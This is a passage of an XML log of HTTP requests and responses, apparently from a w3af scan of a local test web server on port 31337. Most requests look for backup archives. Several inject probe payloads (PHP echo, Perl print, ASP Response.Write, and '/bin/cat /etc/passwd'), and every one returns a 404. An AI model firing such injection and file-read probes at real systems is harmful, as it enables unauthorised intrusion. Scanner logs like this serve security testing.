                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="237">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="237">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="238">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.gzip HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="238">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="239">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.rar HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="239">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="240">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.116.gz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="240">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="549" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.116.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="241">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="241">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;Type your pseudonyme and message!&lt;/p&gt;
    &lt;form action='/post' method='post'&gt;
        &lt;input type='text' name='pseudo' /&gt;
        &lt;input type='textarea' name='message' /&gt;
        &lt;input type='submit' value='ok' /&gt;
    &lt;/form&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="242">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.116.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="242">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="553" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.116.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="243">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.zip HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="243">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="244">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.116.tgz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="244">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.116.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="245">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.116.rar HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="245">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.116.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="246">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.116.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="246">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="552" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.116.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="247">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.116.zip HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="247">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.116.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="248">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/echo+str_repeat%28%27rkdxj%27%2C5%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="248">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="249">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.116.gzip HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="249">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.116.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="250">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.116.7z HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="250">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="549" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.116.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="251">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/print+%27rkdxj%27x5 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="251">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="252">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.116.cab HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="252">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.116.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="253">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/print+%27rkdxj%27%2A5 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="253">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="254">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/Response.Write%28new+String%28%22rkdxj%22%2C5%29%29 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="254">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="584" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Response.Write%28new+String%28%22rkdxj%22%2C5%29%29&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="256">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="256">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="257">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="257">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="258">
                <httprequest>
